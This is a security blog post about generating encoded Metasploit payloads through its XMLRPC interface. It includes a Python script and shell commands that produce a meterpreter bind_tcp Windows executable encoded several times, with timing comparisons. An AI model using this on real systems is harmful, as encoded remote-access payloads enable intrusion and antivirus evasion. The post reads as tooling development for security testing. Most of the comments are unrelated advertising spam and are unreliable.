Blog.HappyPacket.net

Security Notes, News, and Thoughts

Fun with Metasploit payload generation

Tonight has been fun, I have been learning more about how payloads are generated inside Metasploit. My goal was to figure out how to add the msfencode functionality into the generate_simple function that is used by both XMLRPC and the console so that you can encode payloads and all that fun stuff from within Metasploit. I think I have it working now, and once Metasploit is loaded there seems to be a significant speed difference. Here is what I found:

I wrote a quick xmlrpc test to get an executable payload from Metasploit encoding it 7 times with whatever encoder it thinks is best. The code I'm using hasn't been committed or submitted yet, but if you want to test it I can provide you a patch until I'm happy enough with it to submit it.


import xmlrpclib
import binascii
proxy = xmlrpclib.ServerProxy("http://localhost:55553")

ret = proxy.auth.login("msf","abc123")
if ret['result'] == 'success':
token = ret['token']
else:
print "Could not login\n"

opts = {
"Format" : 'exe',
"Iterations" : 7,
"ForceEncode" : True}

ret = proxy.module.execute(token,"payload","windows/meterpreter/bind_tcp",opts)
if(ret['result'] == 'success'):
print binascii.unhexlify(ret['payload'])




Next.. I decided to do a test of the xmlrpc vs the traditional way of doing it:


root@bt:~/msfmods/py# time (python get_payload.py > /tmp/test3)

real 0m3.839s
user 0m0.020s
sys 0m0.043s
root@bt:~/msfmods/py# time (~/metasploit/msfpayload windows/meterpreter/bind_tcp raw | ~/metasploit/msfencode -t exe -c 5 -o /tmp/test2 2>/dev/null )

real 0m10.548s
user 0m7.553s
sys 0m2.920s
root@bt:~/msfmods/py# file /tmp/test2 /tmp/test3
/tmp/test2: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
/tmp/test3: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit




It definitely appears we have a speed increase, and with the additional overhead of an auth in the way, it's possible to take a little bit more time off of it. Being able to do this over XMLRPC hopefully will give a good way for folks to grab payloads remotely and easily for common tasks.

Have thoughts or suggestions ?

Hit me up at sussurro [aT] happypacket DOT net

20 comments:

Unknown said...

it awesome artical.i found it so educational.

Eva E. Murphy said...

I think, my friend has shared this post by mistake because I asked him to find someone who can Do My Dissertation Uk
format and I do not know why he has shared this post with me but I must say, you have posted very nice information which can be beneficial for many students.

William Woodruff said...

My last week was spent learning how to generate payloads inside Metasploit, but still, I had some questions, and I was looking for their answers. After reading your blog, I identified an error that caused me to fail. British Writings

Unknown said...
This comment has been removed by the author.
Unknown said...

Being a blog writer is tough you have to be genuine about everything because your fans believe you blindly. This is a lot of pressure. I follow a blogger and she posts reviews about academic online services. I recently took this Marketing thesis help on her recommendation and believe me it turned out to be the best decision. Your authenticity is what gets you, followers!

Sarah gough said...

it awesome artical.i found it so educational. and every ones know that your writing style its adorable i am designer i have best collection of shearling leather jackets for men in USA

David Portal said...

Leather Jackets for men are a great way to add a touch of style to your look and they can also keep you warm in cooler weather.

john stan said...

it awesome artical.i found it so educational. and every ones know that your writing style its adorable by the way i am agent in save driver company we provide best dubai safe driver.

Diane Sawyer said...

I think it's a great idea! I would love to be able to pay for grades in online class. It would incentive me to do my best and get good grades.

Kadine Alves said...

I think it's a fantastic plan! I love reading your article keep up with the good work. It is such an amazing blog. Take my hesi exam for me

Unknown said...

I found your post on "Fun with Metasploit payload generation" quite interesting. However, as a healthcare enthusiast, I would like to suggest that your readers check out Meri Sehat.pk - an online healthcare services provider that offers a variety of services, including an online BP check app. This app is very helpful for people who want to monitor their blood pressure at home and keep track of their health. It's always great to see technology being used for the betterment of our health, and I believe Meri Sehat.pk is doing a fantastic job in that regard.

Alina Aimes said...

I have read your post but I can't understand to your post, I was busy with cheap dissertation writing services

Cmolds Creativity said...

The App Design and Development Company is a game-changer. Their seamless blend of stunning design and robust development creates user-centric apps that captivate audiences and deliver exceptional experiences. Truly impressive!

Ariel Wilson said...

Presents an exciting opportunity to explore the world of Metasploit payload generation. This resource offers hands-on experiences for cybersecurity enthusiasts looking to expand their knowledge in ethical hacking. When faced with academic challenges, reliable services can assist in achieving academic success by providing expert guidance and support with assignments.
Source: write my assignment for me

Carlo James said...

Moreover, I found the connection you made to "tape autoloaders" intriguing. While it might seem like an unusual pairing, the integration of Metasploit's payload generation capabilities with tape autoloaders presents an innovative perspective. It's a reminder that cybersecurity is a constantly evolving field, and creative thinking is vital to staying ahead of potential threats.

Kevin Mark. said...

Mass texting refers to sending a large number of text messages simultaneously to a group of people. It's often used by businesses, organizations, or event planners to communicate important updates, promotions, or reminders quickly and efficiently. With mass texting, you can reach a wide audience instantly, making it an effective tool for keeping everyone informed and engaged. Whether it's announcing a sale, inviting people to an event, or sharing urgent news, mass texting simplifies communication on a large scale.




Harry R. said...

Nice article its very informative and useful blog thanks for sharing. we are offering some amazing outfit with affordable price Baseball black & gold varsity jacket

Austin Smith said...


Metasploit is such a powerful tool for security testing, and exploring its payload generation capabilities is always enlightening. It's like fine-tuning an art form, where every detail counts. By the way, if you're in Dubai and considering some aesthetic work, Dr. Leonard's 'less is more' approach to Liposuction Dubai is worth checking out for those seeking natural-looking results.

Creative Coloring World said...

Printable coloring pages are a true gem for busy parents. They keep my children entertained and foster their creativity. Thanks for providing such an enjoyable and easy-to-access resource!

Horizon Garage Door said...

For reliable garage door repair in Howard County, trust the experts. Our skilled technicians handle everything from broken springs and cables to malfunctioning openers and off-track doors. We offer prompt, professional service to ensure your garage door operates smoothly and safely. Using high-quality parts and state-of-the-art tools, we fix issues efficiently, minimizing downtime.

Whether it’s a minor repair or a complete overhaul, we provide affordable solutions with a satisfaction guarantee. Contact us today for a free estimate and experience top-notch garage door repair Howard County services. Your convenience and safety are our top priorities.